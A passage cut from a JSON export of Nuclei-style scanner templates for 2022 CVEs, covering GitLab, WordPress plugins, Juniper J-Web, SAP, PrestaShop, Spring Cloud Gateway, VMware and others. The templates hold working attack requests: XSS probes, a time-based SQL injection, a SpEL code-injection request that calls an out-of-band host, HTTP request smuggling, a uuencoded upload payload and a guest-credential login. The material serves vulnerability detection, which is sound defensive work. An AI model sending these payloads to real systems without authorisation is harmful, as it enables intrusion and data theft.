M=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\n M,BTR,34X-R([\"G!R:6YT('-Y@```$,``````````````+2!`````\"XN+RXN\n M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n `\n end\n 
------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n - |\n GET /OA_CGI/FNDWRR.exe HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"bne:uueupload\"\n\n TRUE\n ------WebKitFormBoundaryZsMro0UsAQYLDZGv\n Content-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\n begin 664 test.zip\n M4$L#!!0``````&UP-%:3!Malert(document.domain)\") && contains(body, \"microweber\")'\n - 'contains(content_type, \"text/html\")'\n condition: and\n# digest: 490a0046304402207b0db83c22e130322437f1502e113df36df14a74f5080f56e6281a41e9c5ea0c0220391b8aae54c023d95b44dc3d6d6e938160b8236a2e5b130fc7a3441f22d711a9:922c64590222798bb761d5b6d8e72950", "hash": "5a5cc6af40f98d65048ea45bdadc3521", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308495" }, "name": "CVE-2022-2185.yaml", "content": "id: CVE-2022-2185\n\ninfo:\n name: GitLab CE/EE - Remote Code Execution\n author: GitLab Red Team\n severity: high\n description: GitLab CE/EE 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 is susceptible to remote code execution. 
An authenticated user authorized to import projects can import a maliciously crafted project, thus possibly being able to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system. Low-privilege authenticated access is required (the CVSS vector is PR:L). Note that this template does not exercise the import path; it only fingerprints the GitLab release by the content hash in the application-<hash>.css asset name served on /users/sign_in and compares it against a fixed list, so a match indicates a version in the affected range rather than a confirmed exploit, and an instance with a customised or differently served asset bundle will not be flagged.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to GitLab 14.10.5, 15.0.4 or 15.1.1 (or later) for the 14.x, 15.0 and 15.1 lines respectively.\n reference:\n - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester\n - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2185\n - https://gitlab.com/gitlab-org/gitlab/-/issues/366088\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-2185\n cwe-id: CWE-78\n epss-score: 0.5071\n epss-percentile: 0.97469\n cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*\n metadata:\n max-request: 1\n vendor: gitlab\n product: gitlab\n shodan-query: http.title:\"GitLab\"\n tags: cve,cve2022,gitlab\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/users/sign_in\"\n\n redirects: true\n max-redirects: 3\n matchers:\n - type: word\n words:\n - \"003236d7e2c5f1f035dc8b67026d7583ee198b568932acd8faeac18cec673dfa\"\n - \"1062bbba2e9b04e360569154a8df8705a75d9e17de1a3a9acd5bd20f000fec8b\"\n - \"1832611738f1e31dd00a8293bbf90fce9811b3eea5b21798a63890dbc51769c8\"\n - \"1ae98447c220181b7bd2dfe88018cb6e1b1e4d12d7b8c224d651a48ed2d95dfe\"\n - \"1d765038b21c5c76ff8492561c29984f3fa5c4b8cfb3a6c7b216ac8ab18b78c7\"\n - \"1d840f0c4634c8813d3056f26cbab7a685d544050360a611a9df0b42371f4d98\"\n - \"2ea7e9be931f24ebc2a67091b0f0ff95ba18e386f3d312545bb5caaac6c1a8be\"\n - \"301b60d2c71a595adfb65b22edee9023961c5190e1807f6db7c597675b0a61f0\"\n - 
\"383b8952f0627703ada7774dd42f3b901ea2e499fd556fce3ae0c6d604ad72b7\"\n - \"4f233d907f30a050ca7e40fbd91742d444d28e50691c51b742714df8181bf4e7\"\n - \"50d9206410f00bb00cc8f95865ab291c718e7a026e7fdc1fc9db0480586c4bc9\"\n - \"515dc29796a763b500d37ec0c765957a136c9e1f1972bb52c3d7edcf4b6b8bbe\"\n - \"57e83f1a3cf7c0fe3cf2357802306688dab60cf6a30d00e14e67826070db92de\"\n - \"5cd37ee959b5338b5fb48eafc6c7290ca1fa60e653292304102cc19a16cc25e4\"\n - \"5df2cb13ec314995ea43d698e888ddb240dbc7ccb6e635434dc8919eced3e25f\"\n - \"6a58066d1bde4b6e661fbd5bde83d2dd90615ab409b8c8c36e04954fbd923424\"\n - \"6eb5eaa5726150b8135a4fd09118cfd6b29f128586b7fa5019a04f1c740e9193\"\n - \"6fa9fec63ba24ec06fcae0ec30d1369619c2c3323fe9ddc4849af86457d59eef\"\n - \"739a920f5840de93f944ec86c5a181d0205f1d9e679a4df1b9bf5b0882ab848a\"\n - \"775f130d36e9eb14cb67c6a63551511b87f78944cebcf6cdddb78292030341df\"\n - \"7d0792b17e1d2ccac7c6820dda1b54020b294006d7867b7d78a05060220a0213\"\n - \"8b78708916f28aa9e54dacf9c9c08d720837ce78d8260c36c0f828612567d353\"\n - \"90abf7746df5cb82bca9949de6f512de7cb10bec97d3f5103299a9ce38d5b159\"\n - \"95ae8966ec1e6021f2553c7d275217fcfecd5a7f0b206151c5fb701beb7baf1e\"\n - \"a4333a9de660b9fc4d227403f57d46ec275d6a6349a6f5bda0c9557001f87e5d\"\n - \"a6d68fb0380bece011b0180b2926142630414c1d7a3e268fb461c51523b63778\"\n - \"a743f974bacea01ccc609dcb79247598bd2896f64377ce4a9f9d0333ab7b274e\"\n - \"a8bf3d1210afa873d9b9af583e944bdbf5ac7c8a63f6eccc3d6795802bd380d2\"\n - \"ba74062de4171df6109c4c96da1ebe2b538bb6cc7cd55867cbdfba44777700e1\"\n - \"c91127b2698c0a2ae0103be3accffe01995b8531bf1027ae4f0a8ad099e7a209\"\n - \"cfa6748598b5e507db0e53906a7639e2c197a53cb57da58b0a20ed087cc0b9d5\"\n - \"e539e07c389f60596c92b06467c735073788196fa51331255d66ff7afde5dfee\"\n - \"f8ba2470fbf1e30f2ce64d34705b8e6615ac964ea84163c8a6adaaf8a91f9eac\"\n - \"ff058b10a8dce9956247adba2e410a7f80010a236b2269fb53e0df5cd091e61d\"\n condition: or\n\n extractors:\n - type: regex\n group: 1\n regex:\n - 
'(?:application-)(\\S{64})(?:\\.css)'\n# digest: 4b0a00483046022100b4127186492776d7641a3e74b310dc16db32c61bcc8aaf0f5eed928c30579768022100a3666fdd83770c9f2bdb11e06228e33df10080c5bea500dad29a7d9ff311b7e1:922c64590222798bb761d5b6d8e72950", "hash": "adb1073364273435a496254eaeade152", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308496" }, "name": "CVE-2022-2187.yaml", "content": "id: CVE-2022-2187\n\ninfo:\n name: WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting\n author: For3stCo1d\n severity: medium\n description: |\n WordPress Contact Form 7 Captcha plugin before 0.1.2 contains a reflected cross-site scripting vulnerability. It does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Update the WordPress Contact Form 7 Captcha plugin to version 0.1.2 or later to mitigate the XSS vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4fd2f1ef-39c6-4425-8b4d-1a332dabac8d\n - https://wordpress.org/plugins/contact-form-7-simple-recaptcha\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2187\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2187\n cwe-id: CWE-79\n epss-score: 0.00122\n epss-percentile: 0.46372\n cpe: cpe:2.3:a:contact_form_7_captcha_project:contact_form_7_captcha:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: contact_form_7_captcha_project\n product: contact_form_7_captcha\n framework: wordpress\n tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,wp,contact_form_7_captcha_project\n\nhttp:\n - method: GET\n path:\n - 
'{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\">'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"Contact Form 7\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220135e8e57aec52c36062249a9f60be0fd5bb87f786de39d6a8fbfe9a3c76dc61402205d74f1cbbc26e6b54ae5d6133836104c105071da796608ae749dddbe1863f8d0:922c64590222798bb761d5b6d8e72950", "hash": "ac488444f22fbcd9fa688c3ec1c76264", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308497" }, "name": "CVE-2022-2219.yaml", "content": "id: CVE-2022-2219\n\ninfo:\n name: Unyson < 2.7.27 - Cross Site Scripting\n author: r3Y3r53\n severity: high\n description: |\n The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access, data theft, and potential compromise of the affected website.\n remediation: Fixed in version 2.7.27\n reference:\n - https://wpscan.com/vulnerability/1240797c-7f45-4c36-83f0-501c544ce76a\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2219\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N\n cvss-score: 7.2\n cve-id: CVE-2022-2219\n cwe-id: CWE-79\n epss-score: 0.00159\n epss-percentile: 0.51461\n cpe: cpe:2.3:a:brizy:unyson:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: brizy\n product: unyson\n framework: wordpress\n tags: cve,cve2022,authenticated,wordpress,wp,xss,unyson,wp-plugin,wpscan,brizy\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET 
/wp-admin/admin.php?page=fw-extensions&sub-page=extension&extension=feedback HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"script%3Ealert%28document.domain%29%3C%2Fscript%3\")'\n - 'contains(body_2, \"Unyson\")'\n condition: and\n# digest: 4a0a00473045022100cfcefb399374a0e1dd65cd66bf15ae4aca3a1a21386b55b3834dbf0526915376022067dfec245e79a0071cf91a2c9932e98f3027dac527f5492b772e911ecb8c28d4:922c64590222798bb761d5b6d8e72950", "hash": "0681aba249ae9aa22ea8bd7ea7f99267", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308498" }, "name": "CVE-2022-22242.yaml", "content": "id: CVE-2022-22242\n\ninfo:\n name: Juniper Web Device Manager - Cross-Site Scripting\n author: EvergreenCartoons\n severity: medium\n description: |\n Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 
This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by Juniper Networks to mitigate this vulnerability.\n reference:\n - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/\n - https://supportportal.juniper.net/s/article/2022-10-Security-Bulletin-Junos-OS-Multiple-vulnerabilities-in-J-Web?language=en_US\n - https://kb.juniper.net/JSA69899\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22242\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-22242\n cwe-id: CWE-79\n epss-score: 0.41023\n epss-percentile: 0.972\n cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: juniper\n product: junos\n shodan-query: title:\"Juniper Web Device Manager\"\n tags: cve2022,cve,xss,juniper,junos\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/error.php?SERVER_NAME='\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n - \"The requested resource is not authorized to view\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 
4b0a00483046022100dd079776ea27c19753a8ad4a76e5c18c893747a661ca9102e5624558800ef324022100a443205263e77c92329409a8c948bd4c67eeffeb1aca399e376c871088778361:922c64590222798bb761d5b6d8e72950", "hash": "03946d9a174d70367fc8ca9322b2e95c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308499" }, "name": "CVE-2022-22536.yaml", "content": "id: CVE-2022-22536\n\ninfo:\n name: SAP Memory Pipes (MPI) Desynchronization\n author: pdteam\n severity: critical\n description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive data and potential data leakage.\n remediation: |\n Apply the latest security patches and updates provided by SAP to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22536\n - https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022\n - https://github.com/Onapsis/onapsis_icmad_scanner\n - https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/\n - https://launchpad.support.sap.com/#/notes/3123396\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2022-22536\n cwe-id: CWE-444\n epss-score: 0.96507\n epss-percentile: 0.99572\n cpe: cpe:2.3:a:sap:content_server:7.53:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: sap\n product: 
content_server\n shodan-query: http.favicon.hash:-266008933\n tags: cve,cve2022,sap,smuggling,netweaver,web-dispatcher,memory-pipes,kev\n\nhttp:\n - raw:\n - |+\n GET {{sap_path}} HTTP/1.1\n Host: {{Hostname}}\n Content-Length: 82646\n Connection: keep-alive\n\n {{repeat(\"A\", 82642)}}\n\n GET / HTTP/1.1\n Host: {{Hostname}}\n\n payloads:\n sap_path:\n # based on https://github.com/Onapsis/onapsis_icmad_scanner\n - /sap/admin/public/default.html\n - /sap/public/bc/ur/Login/assets/corbu/sap_logo.png\n stop-at-first-match: true\n unsafe: true\n read-all: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - \"contains(tolower(body), 'administration')\"\n - \"contains(tolower(header), 'content-type: image/png')\"\n condition: or\n\n - type: word\n part: body\n words:\n - \"HTTP/1.0 400 Bad Request\" # error in concatenated response\n - \"HTTP/1.0 500 Internal Server Error\"\n - \"HTTP/1.0 500 Dispatching Error\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220625e735423251591072249e5f4c141a534b0b1abf0e798f02463087caee9f42c022100a73cdb01bbb0719b01521f92e0e2542f481efa8d92ad61f31787a51cf819d1a2:922c64590222798bb761d5b6d8e72950", "hash": "39d285bcc4e17a5778251c6960335da4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849a" }, "name": "CVE-2022-22733.yaml", "content": "id: CVE-2022-22733\n\ninfo:\n name: Apache ShardingSphere ElasticJob-UI privilege escalation\n author: Zeyad Azima\n severity: medium\n description: |\n Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. 
This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n impact: |\n Successful exploitation of this vulnerability could result in unauthorized access and control of the ElasticJob-UI application.\n remediation: |\n Apply the latest security patches or updates provided by Apache ShardingSphere to mitigate the privilege escalation vulnerability.\n reference:\n - https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22733\n - https://lists.apache.org/thread/qpdsm936n9bhksb0rzn6bq1h7ord2nm6\n - http://www.openwall.com/lists/oss-security/2022/01/20/2\n - https://github.com/Zeyad-Azima/CVE-2022-22733\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-22733\n cwe-id: CWE-200\n epss-score: 0.12656\n epss-percentile: 0.95328\n cpe: cpe:2.3:a:apache:shardingsphere_elasticjob-ui:3.0.0:-:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: apache\n product: shardingsphere_elasticjob-ui\n shodan-query: http.favicon.hash:816588900\n tags: cve2022,cve,exposure,sharingsphere,apache\n\nhttp:\n - raw:\n - |\n POST /api/login HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/plain, */*\n Access-Token:\n Content-Type: application/json;charset=UTF-8\n Origin: {{RootURL}}\n Referer: {{RootURL}}\n\n {\"username\":\"guest\",\"password\":\"guest\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"success\":true'\n - '\"isGuest\":true'\n - '\"accessToken\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f6af293cbdd4986d1af6b7b77c096113f537236e7ea53a74d1723cc59ef0491f02204739dd5828b2f03b95cb3d91c20c90771e760b69a978c0572704cdc1feb82038:922c64590222798bb761d5b6d8e72950", "hash": 
"126a3f27bb5b4c5b4d27f7600f5180c3", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849b" }, "name": "CVE-2022-22897.yaml", "content": "id: CVE-2022-22897\n\ninfo:\n name: PrestaShop Ap Pagebuilder <= 2.4.4 SQL Injection\n author: mastercho\n severity: critical\n description: |\n A SQL injection vulnerability in the product_all_one_img and image_product parameters of the ApolloTheme AP PageBuilder component through 2.4.4 for PrestaShop allows unauthenticated attackers to exfiltrate database data.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.\n remediation: |\n Upgrade PrestaShop Ap Pagebuilder to version 2.4.5 or later to mitigate this vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22897\n - https://packetstormsecurity.com/files/cve/CVE-2022-22897\n - https://security.friendsofpresta.org/modules/2023/01/05/appagebuilder.html\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/karimhabush/cyberowl\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22897\n cwe-id: CWE-89\n epss-score: 0.04685\n epss-percentile: 0.91818\n cpe: cpe:2.3:a:apollotheme:ap_pagebuilder:*:*:*:*:*:prestashop:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: apollotheme\n product: ap_pagebuilder\n framework: prestashop\n shodan-query: http.component:\"Prestashop\"\n tags: cve,cve2022,packetstorm,prestashop,sqli,unauth,apollotheme\n\nhttp:\n - raw:\n - |\n POST /modules/appagebuilder/apajax.php?rand={{rand_int(0000000000000, 9999999999999)}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n Referer: {{RootURL}}\n X-Requested-With: XMLHttpRequest\n\n leoajax=1&product_one_img=if(now()=sysdate()%2Csleep(6)%2C0)\n - |\n GET /modules/appagebuilder/config.xml HTTP/1.1\n Host: 
{{Hostname}}\n\n extractors:\n - type: regex\n name: version\n part: body_2\n internal: true\n group: 1\n regex:\n - \"\\\\s*\\\\s*<\\\\/version>\"\n matchers:\n - type: dsl\n dsl:\n - 'duration_1>=6'\n - 'status_code_2 == 200 && compare_versions(version, \"<= 2.4.4\")'\n condition: and\n# digest: 4a0a00473045022029319142054ee6f0ddb0bc16189b4c16e59004c93276cc82b97b27cc4d5a5efb022100bc6b21b2081ff6e7b7e7e71fab33e9484dfe3b6239cc8b11961d4ad845db15c1:922c64590222798bb761d5b6d8e72950", "hash": "83edde95635f070f84f72e5f5f95d96e", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849c" }, "name": "CVE-2022-2290.yaml", "content": "id: CVE-2022-2290\n\ninfo:\n name: Trilium <0.52.4 - Cross-Site Scripting\n author: dbrwsky\n severity: medium\n description: Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected Trilium instance.\n remediation: |\n Upgrade Trilium to version 0.52.4 or later, which includes proper input sanitization to mitigate the XSS vulnerability.\n reference:\n - https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/\n - https://github.com/zadam/trilium\n - https://github.com/zadam/trilium/commit/3faae63b849a1fabc31b823bb7af3a84d32256a7\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2290\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-2290\n cwe-id: CWE-79\n epss-score: 0.001\n epss-percentile: 0.40139\n cpe: cpe:2.3:a:trilium_project:trilium:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: 
trilium_project\n product: trilium\n shodan-query: title:\"Trilium Notes\"\n tags: cve,cve2022,xss,trilium,huntr,trilium_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'\n - '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'\n - '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename'\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"No handler matched for custom \"\n - \"Note '' not found\"\n condition: or\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 404\n# digest: 4a0a004730450221009f17fcdc98badc0464257c420fab598e7343e41d66382b910b98fd7005d968a0022040758dbc4500b3ca9aaa3096213583ee7175eb34c798a02991e0af55731a6641:922c64590222798bb761d5b6d8e72950", "hash": "728bd4f54786a669d9f47ec3ae6792fa", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849d" }, "name": "CVE-2022-22947.yaml", "content": "id: CVE-2022-22947\n\ninfo:\n name: Spring Cloud Gateway Code Injection\n author: pdteam\n severity: critical\n description: Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. 
A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches provided by the vendor and ensure proper input validation to prevent code injection attacks.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22947\n - https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/\n - https://github.com/wdahlenburg/spring-gateway-demo\n - https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published\n - https://tanzu.vmware.com/security/cve-2022-22947\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2022-22947\n cwe-id: CWE-917,CWE-94\n epss-score: 0.97494\n epss-percentile: 0.99975\n cpe: cpe:2.3:a:vmware:spring_cloud_gateway:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: vmware\n product: spring_cloud_gateway\n tags: cve,cve2022,apache,spring,vmware,actuator,oast,kev\n\nhttp:\n - raw:\n - |\n POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"predicates\": [\n {\n \"name\": \"Path\",\n \"args\": {\n \"_genkey_0\": \"/{{randstr}}/**\"\n }\n }\n ],\n \"filters\": [\n {\n \"name\": \"RewritePath\",\n \"args\": {\n \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n \"_genkey_1\": \"/${path}\"\n }\n }\n ],\n \"uri\": \"{{RootURL}}\",\n \"order\": 0\n }\n - |\n POST /actuator/gateway/refresh HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\n \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n \"route_id\": \"{{randstr}}\",\n \"filters\": [\n \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 
1]\"\n ],\n \"uri\": \"{{RootURL}}\",\n \"order\": 0\n }\n - |\n DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"/routes/{{randstr}}\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: status\n status:\n - 201\n# digest: 4a0a00473045022010d84f2620ab416e19b190fa0906b396e1ed468adf0f7c479ba08e59807460a0022100b8906cae8b222b3a356af5d1e9c9ec9f43db3d2312c0d00d4a8a9befc8db6ef2:922c64590222798bb761d5b6d8e72950", "hash": "8c96775be95ab736dea995f26d38a54a", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30849e" }, "name": "CVE-2022-22954.yaml", "content": "id: CVE-2022-22954\n\ninfo:\n name: VMware Workspace ONE Access - Server-Side Template Injection\n author: sherlocksecurity\n severity: critical\n description: |\n VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. 
An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n impact: |\n Successful exploitation of this vulnerability could lead to remote code execution, compromising the confidentiality, integrity, and availability of the affected system.\n remediation: |\n Apply the latest security patches provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.tenable.com/blog/vmware-patches-multiple-vulnerabilities-in-workspace-one-vmsa-2022-0011\n - https://www.vmware.com/security/advisories/VMSA-2022-0011.html\n - http://packetstormsecurity.com/files/166935/VMware-Workspace-ONE-Access-Template-Injection-Command-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-22954\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-22954\n cwe-id: CWE-94\n epss-score: 0.97348\n epss-percentile: 0.99878\n cpe: cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: vmware\n product: identity_manager\n shodan-query: http.favicon.hash:-1250474341\n tags: cve2022,cve,workspaceone,kev,tenable,packetstorm,vmware,ssti\n\nhttp:\n - method: GET\n path:\n - 